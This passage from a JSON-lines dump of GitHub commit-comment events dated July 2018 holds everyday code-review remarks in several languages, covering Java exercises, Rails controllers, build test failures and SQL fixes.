[test](https://console.bluemix.net/apps/50e78281-3743-45d3-bdde-edd3185ef004?env_id=ibm:yp:eu-de \"ibm:yp:eu-de:Katrin.Heymann_org:test\"), including this commit"}},"created_at":"2018-07-12T07:41:33Z"}
{"id":"7954486389","type":"CommitCommentEvent","actor":{"login":"savya7223"},"repo":{"name":"projectethan007/tomcat-infra"},"payload":{"comment":{"id":29681363,"position":null,"line":null,"path":null,"commit_id":"0ea0d86164736950b19ebf6ce095d389aa626049","created_at":"2018-07-12T07:41:48Z","updated_at":"2018-07-12T07:41:48Z","author_association":"CONTRIBUTOR","body":"@sanjaysingatalur and  @Akhila-A  this is TF with ASG enabled, use this only needed."}},"created_at":"2018-07-12T07:41:48Z"}
{"id":"7954489367","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681369,"position":21,"line":21,"path":"src/Zad6.java","commit_id":"aa2594a92d8a069dca45e41bc413ae3b4032607e","created_at":"2018-07-12T07:42:27Z","updated_at":"2018-07-12T07:42:27Z","author_association":"COLLABORATOR","body":"brak ciała instrukcji warunkowej,a resztę mam nadzieję, że już sam widzisz "}},"created_at":"2018-07-12T07:42:27Z"}
{"id":"7954489394","type":"CommitCommentEvent","actor":{"login":"martinlippert"},"repo":{"name":"spring-projects/sts4"},"payload":{"comment":{"id":29681370,"position":null,"line":null,"path":null,"commit_id":"2342dc8d3bfb974291883d9ed6a7a1be369b1567","created_at":"2018-07-12T07:42:27Z","updated_at":"2018-07-12T07:42:27Z","author_association":"MEMBER","body":"The issue in the STS3 tracker is https://github.com/spring-projects/spring-ide/issues/268"}},"created_at":"2018-07-12T07:42:27Z"}
{"id":"7954491865","type":"CommitCommentEvent","actor":{"login":"ForesterGoGo"},"repo":{"name":"ForesterGoGo/new-rep"},"payload":{"comment":{"id":29681378,"position":4,"line":2,"path":"README.md","commit_id":"6af4cdff9f2d09d78aae72d47cbca5c3de38e466","created_at":"2018-07-12T07:42:59Z","updated_at":"2018-07-12T07:42:59Z","author_association":"OWNER","body":"good word tittle boy"}},"created_at":"2018-07-12T07:42:59Z"}
{"id":"7954492063","type":"CommitCommentEvent","actor":{"login":"jannie-louwrens"},"repo":{"name":"UnisaProject/UnisaMyAdmin"},"payload":{"comment":{"id":29681379,"position":52,"line":38,"path":"myadmin-service-impls/student-services/src/main/java/za/ac/unisa/myadmin/student/services/controllers/StudentRestServiceImpl.java","commit_id":"895006e6d045857e18c4bc884575a501ae86d3a9","created_at":"2018-07-12T07:43:02Z","updated_at":"2018-07-12T07:43:02Z","author_association":"COLLABORATOR","body":"Actually I have and is in the process of adding a [DateParemterHandler](https://docs.oracle.com/javaee/7/api/javax/ws/rs/ext/ParamConverter.html) for the rest layer.\r\nIt is a work in progress so for now stick with this and I'll refactor the code once I am done with the parameter converter."}},"created_at":"2018-07-12T07:43:02Z"}
{"id":"7954495059","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29681384,"position":null,"line":null,"path":null,"commit_id":"417a0bacb5889f80ef7a5e36df8d00d4298076fc","created_at":"2018-07-12T07:43:42Z","updated_at":"2018-07-12T07:43:42Z","author_association":"NONE","body":"issue_#6803 (mbadams5) - i386-Windows-7-VisualStudio-14: Tests Failed (2096 of 2932 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nDataSetFixture Test Summary\n * Passed: 37\n * Failed: 2\n\nEnergyPlusFixture Test Summary\n * Passed: 448\n * Failed: 197\n\nInputProcessorFixture Test Summary\n * Passed: 40\n * Failed: 9\n\nintegration Test Summary\n * Passed: 6\n * Failed: 619\n\nSQLiteFixture Test Summary\n * Passed: 65\n * Failed: 3\n\nZoneUnitarySystemTest Test Summary\n * Passed: 3\n * Failed: 4\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-71.49%25-red.png)</a> \n"}},"created_at":"2018-07-12T07:43:42Z"}
{"id":"7954498956","type":"CommitCommentEvent","actor":{"login":"Hilbrand"},"repo":{"name":"openhab/openhab2-addons"},"payload":{"comment":{"id":29681389,"position":128,"line":128,"path":"addons/binding/org.openhab.binding.amazonechocontrol/ESH-INF/i18n/amazonechocontrol_de.properties","commit_id":"4d169fc2d7c7ba4bffcd027a2ad7961b06f01f99","created_at":"2018-07-12T07:44:33Z","updated_at":"2018-07-12T07:44:33Z","author_association":"CONTRIBUTOR","body":"A little late for a review :smile: But shouldn't `playCommand` be `startCommand` here?"}},"created_at":"2018-07-12T07:44:33Z"}
{"id":"7954500576","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29681392,"position":5,"line":12,"path":"app/controllers/sessions_controller.rb","commit_id":"9cd9d8d46e7c09b5591171ab712bafbf5034b243","created_at":"2018-07-12T07:44:55Z","updated_at":"2018-07-12T07:44:55Z","author_association":"NONE","body":"@K0H205 '' はいらないですー"}},"created_at":"2018-07-12T07:44:55Z"}
{"id":"7954500905","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29681393,"position":5,"line":22,"path":"app/controllers/users_controller.rb","commit_id":"9cd9d8d46e7c09b5591171ab712bafbf5034b243","created_at":"2018-07-12T07:44:59Z","updated_at":"2018-07-12T07:44:59Z","author_association":"NONE","body":"@K0H205 '' はいらないですー"}},"created_at":"2018-07-12T07:44:59Z"}
{"id":"7954504227","type":"CommitCommentEvent","actor":{"login":"cedricmessiant"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29681401,"position":null,"line":null,"path":null,"commit_id":"6c8266423a868e6104361c20b2fd935eebf97493","created_at":"2018-07-12T07:45:39Z","updated_at":"2018-07-12T07:45:39Z","author_association":"CONTRIBUTOR","body":"https://raw.githubusercontent.com/rajikaimal/react-boilerplate/master/docs/img/react-boilerplate.png"}},"created_at":"2018-07-12T07:45:39Z"}
{"id":"7954508611","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681414,"position":21,"line":21,"path":"src/Zad11.java","commit_id":"a60b92f506a1b99359a693db3ba35c8622ed4e1c","created_at":"2018-07-12T07:46:37Z","updated_at":"2018-07-12T07:46:37Z","author_association":"COLLABORATOR","body":"brak ciała, co to jest 2 ?"}},"created_at":"2018-07-12T07:46:37Z"}
{"id":"7954510107","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681419,"position":12,"line":12,"path":"src/Zad11.java","commit_id":"a60b92f506a1b99359a693db3ba35c8622ed4e1c","created_at":"2018-07-12T07:46:57Z","updated_at":"2018-07-12T07:46:57Z","author_association":"COLLABORATOR","body":"od dzisiaj masz zakaz używania pętli do while :)"}},"created_at":"2018-07-12T07:46:57Z"}
{"id":"7954511938","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681422,"position":14,"line":14,"path":"src/Zad9.java","commit_id":"a60b92f506a1b99359a693db3ba35c8622ed4e1c","created_at":"2018-07-12T07:47:20Z","updated_at":"2018-07-12T07:47:20Z","author_association":"COLLABORATOR","body":"dramat "}},"created_at":"2018-07-12T07:47:20Z"}
{"id":"7954513834","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29681424,"position":21,"line":21,"path":"src/Zad9.java","commit_id":"a60b92f506a1b99359a693db3ba35c8622ed4e1c","created_at":"2018-07-12T07:47:44Z","updated_at":"2018-07-12T07:47:44Z","author_association":"COLLABORATOR","body":"formatowanie kodu itd. dopiero to sprawdzę (:"}},"created_at":"2018-07-12T07:47:44Z"}
{"id":"7954514278","type":"CommitCommentEvent","actor":{"login":"fantexi1987"},"repo":{"name":"fantexi1987/react-antd-admin"},"payload":{"comment":{"id":29681425,"position":null,"line":null,"path":null,"commit_id":"f998e245054d30507699192f4997a63dd2eb03ea","created_at":"2018-07-12T07:47:51Z","updated_at":"2018-07-12T07:47:51Z","author_association":"OWNER","body":"上传文件"}},"created_at":"2018-07-12T07:47:51Z"}
{"id":"7954517637","type":"CommitCommentEvent","actor":{"login":"zhijianli88"},"repo":{"name":"ldorau/nvml"},"payload":{"comment":{"id":29681430,"position":null,"line":null,"path":null,"commit_id":"0b6138c2dd0c7dac757230052dfd8773514d12a8","created_at":"2018-07-12T07:48:36Z","updated_at":"2018-07-12T07:48:36Z","author_association":"NONE","body":"is this patch going to be upstream?"}},"created_at":"2018-07-12T07:48:36Z"}
{"id":"7954518745","type":"CommitCommentEvent","actor":{"login":"K0H205"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29681433,"position":5,"line":22,"path":"app/controllers/users_controller.rb","commit_id":"9cd9d8d46e7c09b5591171ab712bafbf5034b243","created_at":"2018-07-12T07:48:49Z","updated_at":"2018-07-12T07:48:49Z","author_association":"OWNER","body":"只今修正しました！\r\n"}},"created_at":"2018-07-12T07:48:49Z"}
{"id":"7954519849","type":"CommitCommentEvent","actor":{"login":"AM05307"},"repo":{"name":"AM05307/CollectionOfCode_custom"},"payload":{"comment":{"id":29681435,"position":null,"line":null,"path":null,"commit_id":"3a256571568ed62aacd409e6e0f06bbdb41e0f31","created_at":"2018-07-12T07:49:02Z","updated_at":"2018-07-12T07:49:02Z","author_association":"OWNER","body":"출처 : https://tyle.io/blog/61"}},"created_at":"2018-07-12T07:49:02Z"}
{"id":"7954521474","type":"CommitCommentEvent","actor":{"login":"AM05307"},"repo":{"name":"AM05307/CollectionOfCode_custom"},"payload":{"comment":{"id":29681440,"position":null,"line":null,"path":null,"commit_id":"3a256571568ed62aacd409e6e0f06bbdb41e0f31","created_at":"2018-07-12T07:49:24Z","updated_at":"2018-07-12T07:49:24Z","author_association":"OWNER","body":"같이 참고하면 좋은 사이트 : http://alik.info/p/199"}},"created_at":"2018-07-12T07:49:24Z"}
{"id":"7954522815","type":"CommitCommentEvent","actor":{"login":"spodermenpls"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29681446,"position":null,"line":null,"path":null,"commit_id":"6d1c051323bf681a9dfdd806941292d0dcfa6dca","created_at":"2018-07-12T07:49:42Z","updated_at":"2018-07-12T07:49:42Z","author_association":"CONTRIBUTOR","body":"Ich empfehle \"google-Maps\" und \"google-maps\" durch \"Google Maps\" zu ersetzen. 😃 "}},"created_at":"2018-07-12T07:49:42Z"}
{"id":"7954523076","type":"CommitCommentEvent","actor":{"login":"nav74neet"},"repo":{"name":"nav74neet/RL4OpenAIGym"},"payload":{"comment":{"id":29681447,"position":1,"line":1,"path":"cartpole_balance_custom/ReadMe","commit_id":"ea8a042759c4c9ce85df61daacc8f1089139c829","created_at":"2018-07-12T07:49:45Z","updated_at":"2018-07-12T07:49:45Z","author_association":"OWNER","body":"RL for custom design CartPole model in Gazebo"}},"created_at":"2018-07-12T07:49:45Z"}
{"id":"7954524186","type":"CommitCommentEvent","actor":{"login":"cloudde"},"repo":{"name":"cloudde/wajopp"},"payload":{"comment":{"id":29681450,"position":17,"line":17,"path":"editor-style.css","commit_id":"954c3240d961eb4686e84d3f0f5af09b4e59b15a","created_at":"2018-07-12T07:50:00Z","updated_at":"2018-07-12T07:50:00Z","author_association":"OWNER","body":"css "}},"created_at":"2018-07-12T07:50:00Z"}
{"id":"7954533976","type":"CommitCommentEvent","actor":{"login":"a627477797"},"repo":{"name":"a627477797/test"},"payload":{"comment":{"id":29681463,"position":null,"line":null,"path":null,"commit_id":"a41b0f38e3abdeb8c3db4d3a1c2e216ada72c3de","created_at":"2018-07-12T07:52:09Z","updated_at":"2018-07-12T07:52:09Z","author_association":"OWNER","body":"爱仕达多所"}},"created_at":"2018-07-12T07:52:09Z"}
{"id":"7954539338","type":"CommitCommentEvent","actor":{"login":"ErkamKahriman"},"repo":{"name":"DragonetMC/DragonProxy"},"payload":{"comment":{"id":29681469,"position":null,"line":null,"path":null,"commit_id":"aaf1247d25041ce7b2ddc280dfd49e6b3b91bbbb","created_at":"2018-07-12T07:53:17Z","updated_at":"2018-07-12T07:53:17Z","author_association":"CONTRIBUTOR","body":"This is not enough PlayerMovePacket is now PlayerMoveAbsulutePacket.."}},"created_at":"2018-07-12T07:53:17Z"}
{"id":"7954541375","type":"CommitCommentEvent","actor":{"login":"EvanPurkhiser"},"repo":{"name":"aqualad/dot-config-files"},"payload":{"comment":{"id":29681470,"position":null,"line":null,"path":null,"commit_id":"ebf37748e0303e3623f8e174a4f3e143c5f65960","created_at":"2018-07-12T07:53:45Z","updated_at":"2018-07-12T07:53:45Z","author_association":"NONE","body":"lol this is like me here https://github.com/EvanPurkhiser/resume/commit/dae2ce615b8914b87300f22b4052953474cc8317. and yes maybe I was creepin' on your github 👀 "}},"created_at":"2018-07-12T07:53:45Z"}
{"id":"7954545559","type":"CommitCommentEvent","actor":{"login":"Bolth"},"repo":{"name":"jenkins-infra/community-functions"},"payload":{"comment":{"id":29681479,"position":5,"line":18,"path":"tools/node","commit_id":"02ade6ba69e9493794c8c11b6cb25378bba687cd","created_at":"2018-07-12T07:54:40Z","updated_at":"2018-07-12T07:54:40Z","author_association":"NONE","body":"$( printev  |Vaiburied \\Lazarus |AWStats "}},"created_at":"2018-07-12T07:54:40Z"}
{"id":"7954545719","type":"CommitCommentEvent","actor":{"login":"ErkamKahriman"},"repo":{"name":"DragonetMC/DragonProxy"},"payload":{"comment":{"id":29681480,"position":null,"line":null,"path":null,"commit_id":"aaf1247d25041ce7b2ddc280dfd49e6b3b91bbbb","created_at":"2018-07-12T07:54:41Z","updated_at":"2018-07-12T07:54:41Z","author_association":"CONTRIBUTOR","body":"And there are some more packet additions like SetLocalPlayerAsInitializedPacket"}},"created_at":"2018-07-12T07:54:41Z"}
{"id":"7954546477","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29681481,"position":5,"line":13,"path":"main.cpp","commit_id":"1c456da29b7f113a772a29615a42c35d12b97228","created_at":"2018-07-12T07:54:50Z","updated_at":"2018-07-12T07:54:50Z","author_association":"NONE","body":"You should avoid using relative paths. Instead you can define the path to your source directory in CMake with:\r\nADD_DEFINITIONS(-DPROJECT_SOURCE_PATH=\"${PROJECT_SOURCE_DIR}\")\r\nand then us it in your code:\r\nCMainWindow main_window(PROJECT_SOURCE_PATH + string(\"/config/calibConfig.ini\"));"}},"created_at":"2018-07-12T07:54:50Z"}
{"id":"7954551871","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":29681490,"position":null,"line":null,"path":null,"commit_id":"dbaf6c10540fe8fc2cf826dc0e718c7b0ec51516","created_at":"2018-07-12T07:55:58Z","updated_at":"2018-07-12T07:55:58Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://577c6da9.ngrok.io/ui#review:id=3334)"}},"created_at":"2018-07-12T07:55:58Z"}
{"id":"7954551903","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":29681491,"position":null,"line":null,"path":null,"commit_id":"dbaf6c10540fe8fc2cf826dc0e718c7b0ec51516","created_at":"2018-07-12T07:55:58Z","updated_at":"2018-07-12T07:55:58Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-12T07:55:58Z"}
{"id":"7954554642","type":"CommitCommentEvent","actor":{"login":"fnordahl"},"repo":{"name":"openstack-charmers/openstack-mojo-specs"},"payload":{"comment":{"id":29681502,"position":12,"line":21,"path":"helper/setup/delete_router_home.py","commit_id":"5d08c3990386e947cb060a990d4d1d1cf2b19766","created_at":"2018-07-12T07:56:34Z","updated_at":"2018-07-12T07:56:34Z","author_association":"CONTRIBUTOR","body":"As @gnuoy pointed out this definitely should be a helper function instead of a steady sprinkle across all the scripts, sorry about that :) I also think we should change this to just use the OS_CACERT environment variable which will be portable to our after mojo life. (ref: https://github.com/openstack/python-openstackclient/search?q=OS_CACERT&unscoped_q=OS_CACERT) @thedac "}},"created_at":"2018-07-12T07:56:34Z"}
{"id":"7954557080","type":"CommitCommentEvent","actor":{"login":"HoverEpic"},"repo":{"name":"DragonetMC/DragonProxy"},"payload":{"comment":{"id":29681507,"position":null,"line":null,"path":null,"commit_id":"aaf1247d25041ce7b2ddc280dfd49e6b3b91bbbb","created_at":"2018-07-12T07:57:08Z","updated_at":"2018-07-12T07:57:08Z","author_association":"MEMBER","body":"I know, but that was just a \"blind commit\" from github interface, to allow players to still login.\r\nI'll make some work on the full update asap."}},"created_at":"2018-07-12T07:57:08Z"}
{"id":"7954557202","type":"CommitCommentEvent","actor":{"login":"thibautcornolti"},"repo":{"name":"trackit/trackit-server"},"payload":{"comment":{"id":29681508,"position":15,"line":15,"path":"db/migration/0003_add_bill_status.sql","commit_id":"a14cdda2a3ec406c73e66d6f2b6220fa2af6b086","created_at":"2018-07-12T07:57:10Z","updated_at":"2018-07-12T07:57:10Z","author_association":"MEMBER","body":"Should be `ALTER TABLE aws_bill_repository ADD status VARCHAR(255) NULL;`\r\nYou want to add `aws_bill_repository`, not `user`."}},"created_at":"2018-07-12T07:57:10Z"}
{"id":"7954560203","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":29681511,"position":null,"line":null,"path":null,"commit_id":"dbaf6c10540fe8fc2cf826dc0e718c7b0ec51516","created_at":"2018-07-12T07:57:51Z","updated_at":"2018-07-12T07:57:51Z","author_association":"OWNER","body":"asdasd"}},"created_at":"2018-07-12T07:57:51Z"}
{"id":"7954561335","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29681512,"position":68,"line":42,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-12T07:58:05Z","updated_at":"2018-07-12T07:58:05Z","author_association":"OWNER","body":"@xavierlepretre Code comments like  `/** */` ? My understanding from your comments is that code comments is not required. As far as `optx` is concerned, I got your point and I am working on the fix.\r\n"}},"created_at":"2018-07-12T07:58:05Z"}
{"id":"7954561755","type":"CommitCommentEvent","actor":{"login":"ErkamKahriman"},"repo":{"name":"DragonetMC/DragonProxy"},"payload":{"comment":{"id":29681513,"position":null,"line":null,"path":null,"commit_id":"aaf1247d25041ce7b2ddc280dfd49e6b3b91bbbb","created_at":"2018-07-12T07:58:11Z","updated_at":"2018-07-12T07:58:11Z","author_association":"CONTRIBUTOR","body":"lol ok"}},"created_at":"2018-07-12T07:58:11Z"}
{"id":"7954561803","type":"CommitCommentEvent","actor":{"login":"magnars"},"repo":{"name":"kodemaker/kodemaker.no"},"payload":{"comment":{"id":29681514,"position":null,"line":null,"path":null,"commit_id":"c9ab214b7b95c2b8c3052070133f90a013b93496","created_at":"2018-07-12T07:58:11Z","updated_at":"2018-07-12T07:58:11Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-12T07:58:11Z"}
{"id":"7954564618","type":"CommitCommentEvent","actor":{"login":"masisa07"},"repo":{"name":"masisa07/cursospring"},"payload":{"comment":{"id":29681538,"position":null,"line":null,"path":null,"commit_id":"b7498cfe3b9003bbe3e3527b86ba71b1dec46ffc","created_at":"2018-07-12T07:58:48Z","updated_at":"2018-07-12T07:58:48Z","author_association":"OWNER","body":"Este es el código del curso de spring de Udemy impartido por Guru."}},"created_at":"2018-07-12T07:58:48Z"}
{"id":"7954564762","type":"CommitCommentEvent","actor":{"login":"winder"},"repo":{"name":"winder/Universal-G-Code-Sender"},"payload":{"comment":{"id":29681542,"position":33,"line":139,"path":"ugs-core/src/com/willwinder/universalgcodesender/TinyGUtils.java","commit_id":"b77ec1ce6463895a37eb65ede13b12a0fc85ac42","created_at":"2018-07-12T07:58:49Z","updated_at":"2018-07-12T07:58:49Z","author_association":"OWNER","body":"I think I prefer the \"complicated\" version. I'm not sure this is any more readable than what you had before. Alternatively, you could make a couple `getOrDefault(<field>, <json>, <int|double>)` helpers to flatten out the if statements."}},"created_at":"2018-07-12T07:58:49Z"}
{"id":"7954568146","type":"CommitCommentEvent","actor":{"login":"oehme"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29681559,"position":70,"line":70,"path":"subprojects/dependency-management/src/main/java/org/gradle/api/internal/artifacts/dsl/FileSystemPublishArtifact.java","commit_id":"373bc5d54fb122b3169a971988b7a25625e6c834","created_at":"2018-07-12T07:59:30Z","updated_at":"2018-07-12T07:59:30Z","author_association":"MEMBER","body":"This should return the task dependencies of the provider is a task output property."}},"created_at":"2018-07-12T07:59:30Z"}
{"id":"7954569734","type":"CommitCommentEvent","actor":{"login":"winder"},"repo":{"name":"winder/Universal-G-Code-Sender"},"payload":{"comment":{"id":29681562,"position":108,"line":183,"path":"ugs-core/src/com/willwinder/universalgcodesender/TinyGUtils.java","commit_id":"b77ec1ce6463895a37eb65ede13b12a0fc85ac42","created_at":"2018-07-12T07:59:51Z","updated_at":"2018-07-12T07:59:51Z","author_association":"OWNER","body":"Are you using MM instead of `currentUnits` intentionally?"}},"created_at":"2018-07-12T07:59:51Z"}
{"id":"7954575755","type":"CommitCommentEvent","actor":{"login":"isbm"},"repo":{"name":"saltstack/salt"},"payload":{"comment":{"id":29681574,"position":5,"line":143,"path":"salt/roster/ansible.py","commit_id":"d0e5515757c9265fb2a9104bf3d0ebdc07c4918b","created_at":"2018-07-12T08:01:06Z","updated_at":"2018-07-12T08:01:06Z","author_association":"CONTRIBUTOR","body":"This is a shallow copy. Make sure it doesn't hurt."}},"created_at":"2018-07-12T08:01:06Z"}
{"id":"7954579854","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29681578,"position":11,"line":11,"path":"config/calibConfig-backup.ini","commit_id":"1c456da29b7f113a772a29615a42c35d12b97228","created_at":"2018-07-12T08:01:57Z","updated_at":"2018-07-12T08:01:57Z","author_association":"NONE","body":"Note that one of the purposes of refactoring the project is to deal with different combinations (and different numbers) of sensors seamlessly. Thus, we need to define the poses of all the sensors that we want to calibrate, if there is only a pair of sensors, we need to set 2 poses (one sensor could be set to the identity). I think it's more clean and easier to code if we read the rotation as a 3x3 matrix, and then the translation."}},"created_at":"2018-07-12T08:01:57Z"}
{"id":"7954580833","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29681579,"position":1,"line":1,"path":"config/calibConfig-backup.ini","commit_id":"1c456da29b7f113a772a29615a42c35d12b97228","created_at":"2018-07-12T08:02:10Z","updated_at":"2018-07-12T08:02:10Z","author_association":"NONE","body":"Also, you can create an optional parameter in the rawlog to define the path to the rawlog file"}},"created_at":"2018-07-12T08:02:10Z"}
{"id":"7954602686","type":"CommitCommentEvent","actor":{"login":"Eneszaza21"},"repo":{"name":"SebastianMichaelis1997/4Gewinnt"},"payload":{"comment":{"id":29681601,"position":null,"line":null,"path":null,"commit_id":"bc3658a1934299af0cf31eaa3d2b49d429b10b92","created_at":"2018-07-12T08:06:43Z","updated_at":"2018-07-12T08:06:43Z","author_association":"COLLABORATOR","body":"Instructions wurden eingefügt\r\n"}},"created_at":"2018-07-12T08:06:43Z"}
{"id":"7954603951","type":"CommitCommentEvent","actor":{"login":"rallahaseh"},"repo":{"name":"lucaalex22/RAImagePicker"},"payload":{"comment":{"id":29681605,"position":null,"line":null,"path":null,"commit_id":"c797194f5d7e859a4ed425e5adec18e6d3fb510e","created_at":"2018-07-12T08:06:58Z","updated_at":"2018-07-12T08:06:58Z","author_association":"NONE","body":"The maximum number of objects to include in the fetch result."}},"created_at":"2018-07-12T08:06:58Z"}
{"id":"7954605276","type":"CommitCommentEvent","actor":{"login":"DawnSunshine"},"repo":{"name":"DawnSunshine/VideoAnalysisServer"},"payload":{"comment":{"id":29681607,"position":null,"line":null,"path":null,"commit_id":"68f9d55fc8f98b803d5db3f6ffa4be2ce03439a7","created_at":"2018-07-12T08:07:14Z","updated_at":"2018-07-12T08:07:14Z","author_association":"OWNER","body":"啦啦啦啦"}},"created_at":"2018-07-12T08:07:14Z"}
{"id":"7954607906","type":"CommitCommentEvent","actor":{"login":"goodGid"},"repo":{"name":"TeamMeowBox/MeowBox-Server"},"payload":{"comment":{"id":29681615,"position":33,"line":48,"path":"routes/mypage/account_setting.js","commit_id":"d88aac392eeb3f67c43dedf02e28a56623c3df8e","created_at":"2018-07-12T08:07:42Z","updated_at":"2018-07-12T08:07:42Z","author_association":"COLLABORATOR","body":"아... 경인아 .... 잘.... 하자. ..... ...... . . . .. ... . . .. . . . .  . ."}},"created_at":"2018-07-12T08:07:42Z"}
{"id":"7954617982","type":"CommitCommentEvent","actor":{"login":"lapido"},"repo":{"name":"lapido/AssetVerificationAPP"},"payload":{"comment":{"id":29681628,"position":null,"line":null,"path":null,"commit_id":"571d21aa6aaba0e2cd3f10dfac8c8ac0cae5888c","created_at":"2018-07-12T08:09:32Z","updated_at":"2018-07-12T08:09:32Z","author_association":"OWNER","body":"-modified sql config"}},"created_at":"2018-07-12T08:09:32Z"}
{"id":"7954621047","type":"CommitCommentEvent","actor":{"login":"cryptocub3"},"repo":{"name":"dan-v/rattlesnakeos-stack"},"payload":{"comment":{"id":29681631,"position":null,"line":null,"path":null,"commit_id":"eb1a621f6914fdfe108011d9d9ea8a4a175e5504","created_at":"2018-07-12T08:10:08Z","updated_at":"2018-07-12T08:10:08Z","author_association":"NONE","body":"I built yestarday for the pixel 2 but didn't flash yet. Need to rebuild again after this patch what exactly is the issue ? thank you"}},"created_at":"2018-07-12T08:10:08Z"}
{"id":"7954623510","type":"CommitCommentEvent","actor":{"login":"tripl3dogdare"},"repo":{"name":"tripl3dogdare/haven-json"},"payload":{"comment":{"id":29681637,"position":null,"line":null,"path":null,"commit_id":"82c943c97342f4a6c8d9c9c13a449bd882b4fc56","created_at":"2018-07-12T08:10:34Z","updated_at":"2018-07-12T08:10:34Z","author_association":"OWNER","body":"The last four commits are a mess because I was desperately trying to get them from a laptop with no available charger up onto GitHub where I could access them freely. One of those days."}},"created_at":"2018-07-12T08:10:34Z"}
{"id":"7954624268","type":"CommitCommentEvent","actor":{"login":"qq594495953"},"repo":{"name":"nl8590687/ASRT_SpeechRecognition"},"payload":{"comment":{"id":29681647,"position":null,"line":null,"path":null,"commit_id":"9d40bb7f242f99933ebaedb2c0dc08f38c8fb207","created_at":"2018-07-12T08:10:42Z","updated_at":"2018-07-12T08:10:42Z","author_association":"NONE","body":"那如果想输出拼音的候补矩阵，而不是直接输出概率最大的拼音，该怎样改啊？"}},"created_at":"2018-07-12T08:10:42Z"}
{"id":"7954629315","type":"CommitCommentEvent","actor":{"login":"tripl3dogdare"},"repo":{"name":"tripl3dogdare/haven-json"},"payload":{"comment":{"id":29681654,"position":null,"line":null,"path":null,"commit_id":"1214b733822001ceddf498e0af65c17c0f09d926","created_at":"2018-07-12T08:11:40Z","updated_at":"2018-07-12T08:11:40Z","author_association":"OWNER","body":"These last few commits are a mess because I was desperately trying to get them from a laptop with no available charger up onto GitHub where I could access them freely. One of those days."}},"created_at":"2018-07-12T08:11:40Z"}
{"id":"7954630717","type":"CommitCommentEvent","actor":{"login":"AC130USpectre"},"repo":{"name":"TelegramMessenger/MTProxy"},"payload":{"comment":{"id":29681657,"position":null,"line":null,"path":null,"commit_id":"cf26efc6367ef3a30cde96ba76d6eaf11871a10a","created_at":"2018-07-12T08:11:57Z","updated_at":"2018-07-12T08:11:57Z","author_association":"NONE","body":"Hi. It would be nice to see a changelog, which issues this commit has solved or which features it has added."}},"created_at":"2018-07-12T08:11:57Z"}
{"id":"7954645311","type":"CommitCommentEvent","actor":{"login":"ymg2007"},"repo":{"name":"MingboPeng/honeybee"},"payload":{"comment":{"id":29681696,"position":null,"line":null,"path":null,"commit_id":"4107f1c89cc2d5d5bf969c1e51fb24ddfa421ea5","created_at":"2018-07-12T08:14:46Z","updated_at":"2018-07-12T08:14:46Z","author_association":"NONE","body":"When using this version of Honeybee_Export To OpenStudio.ghuser coupled with ironbug HVACsystem ,  the rhino 5 and 6 will be crashed. I have tried many times,but the result is not changed.Please test this component on another computer."}},"created_at":"2018-07-12T08:14:46Z"}
{"id":"7954645464","type":"CommitCommentEvent","actor":{"login":"Programming-Skills"},"repo":{"name":"Programming-Skills/my_website"},"payload":{"comment":{"id":29681698,"position":null,"line":null,"path":null,"commit_id":"615c5f64d291aaee11f65df9a1a72b15258333c2","created_at":"2018-07-12T08:14:48Z","updated_at":"2018-07-12T08:14:48Z","author_association":"OWNER","body":"## What is this for??\r\n\r\nPlease explain this line better"}},"created_at":"2018-07-12T08:14:48Z"}
